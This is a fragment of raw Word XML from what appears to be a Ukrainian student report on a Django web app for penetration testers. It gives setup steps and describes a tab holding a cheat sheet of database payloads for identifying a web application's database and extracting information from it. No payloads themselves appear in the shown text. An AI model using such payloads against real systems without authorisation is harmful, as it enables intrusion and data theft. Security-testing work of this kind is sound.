        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF396E3" w14:textId="60354AAE" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pkg-resources==0.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777EDBEF" w14:textId="50F2C45A" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pytz==2019.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6399D3" w14:textId="12DB22C1" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PyYAML==5.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD0FF22" w14:textId="3967F622" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>requests==2.22.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645A4DF1" w14:textId="7C74C110" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tablib==0.14.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F789A" w14:textId="0DF3BB96" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>urllib3==1.25.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A70280E" w14:textId="701B94C0" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xlrd==1.2.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D267352" w14:textId="7EC17F9C" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xlwt==1.3.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60497CFB" w14:textId="4623F240" w:rsidR="00402E58" w:rsidRDefault="00402E58" w:rsidP="00402E58">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Щоб запустити програму потрібно перейти у директорію в якій знаходиться файл </w:t>
      </w:r>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>manage.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> і запустити даний файл використовуючи команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00402E58">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python manage.py runserver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> як зображено на рис. 3.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C115B50" w14:textId="77777777" w:rsidR="0098124E" w:rsidRPr="0098124E" w:rsidRDefault="0098124E" w:rsidP="0098124E">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA877AB" w14:textId="746203BA" w:rsidR="00402E58" w:rsidRPr="00402E58" w:rsidRDefault="00402E58" w:rsidP="00104083">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F35EF0D" wp14:editId="4A4626E3">
            <wp:extent cx="6120130" cy="1256665"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="196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1256665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E70DF7" w14:textId="11D6AF83" w:rsidR="00104083" w:rsidRDefault="00104083" w:rsidP="00104083">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Запуск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>програми</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7417E13F" w14:textId="77777777" w:rsidR="00101F0F" w:rsidRDefault="00101F0F" w:rsidP="00104083">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EE7B02" w14:textId="609E61FA" w:rsidR="00104083" w:rsidRDefault="00104083" w:rsidP="0098124E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Далі потрібно відкрити будь-який браузер і перейти за наступним адресом </w:t>
      </w:r>
      <w:r w:rsidRPr="00104083">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Де ми побачимо домашню сторінку, яка зображена на рис. 3.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3721AFAD" w14:textId="225D635B" w:rsidR="005B4CE1" w:rsidRDefault="005B4CE1" w:rsidP="0098124E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B955EC" w14:textId="77777777" w:rsidR="005B4CE1" w:rsidRPr="0098124E" w:rsidRDefault="005B4CE1" w:rsidP="0098124E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6E50FD" w14:textId="2C6D99F3" w:rsidR="00104083" w:rsidRDefault="00104083" w:rsidP="00104083">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03B7D5E6" wp14:editId="1ECBA4C9">
            <wp:extent cx="6120130" cy="499110"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="152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499110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2AD6E8" w14:textId="282243F5" w:rsidR="002425F2" w:rsidRDefault="00104083" w:rsidP="00636AF5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Запуск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>програми</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4595E658" w14:textId="77777777" w:rsidR="005B4CE1" w:rsidRPr="005B4CE1" w:rsidRDefault="005B4CE1" w:rsidP="005B4CE1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7296FC50" w14:textId="444D3EC3" w:rsidR="00104083" w:rsidRDefault="00104083" w:rsidP="00104083">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc516752162"/>
      <w:bookmarkStart w:id="127" w:name="_Toc30433159"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.1 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
      <w:r w:rsidR="001D30B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Описання першої вкладки програми</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="626DAAA9" w14:textId="77777777" w:rsidR="005B4CE1" w:rsidRPr="005B4CE1" w:rsidRDefault="005B4CE1" w:rsidP="005B4CE1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514149A7" w14:textId="3FA076C7" w:rsidR="001D30B9" w:rsidRPr="001D30B9" w:rsidRDefault="001D30B9" w:rsidP="001D30B9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D30B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>За адресою http://127.0.0.1:8000/#cheat_sheet розміщені корисні навантаження (</w:t>
      </w:r>
      <w:r w:rsidRPr="001D30B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="001D30B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>), які здатні допомогти фахівцям з</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D30B9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>тестування на проникнення</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> визначити, яка база даних використовується у веб-додатку, а також отримати корисну інформацію</w:t>
      </w:r>
      <w:r w:rsidR="0026169A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> використовуючи різні запити до бази даних</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, що може допомогти у подальшому тестуванні </w:t>
      </w:r>
      <w:r w:rsidR="0026169A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>на проникнення. На рис. 3.5 ви можете ознайомитися із зовнішнім виглядом першого пункту меню.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232B0B5" w14:textId="77777777" w:rsidR="001D30B9" w:rsidRPr="001D30B9" w:rsidRDefault="001D30B9" w:rsidP="001D30B9">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE37828" w14:textId="4161E25E" w:rsidR="00104083" w:rsidRDefault="001D30B9" w:rsidP="001D30B9">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="564C27B5" wp14:editId="43801FAE">
            <wp:extent cx="6120130" cy="2580640"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="1016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2580640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="633614C6" w14:textId="2CC7EDF6" w:rsidR="0026169A" w:rsidRDefault="0026169A" w:rsidP="0026169A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707D32BD" w14:textId="6BF6D470" w:rsidR="0026169A" w:rsidRDefault="0026169A" w:rsidP="0026169A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
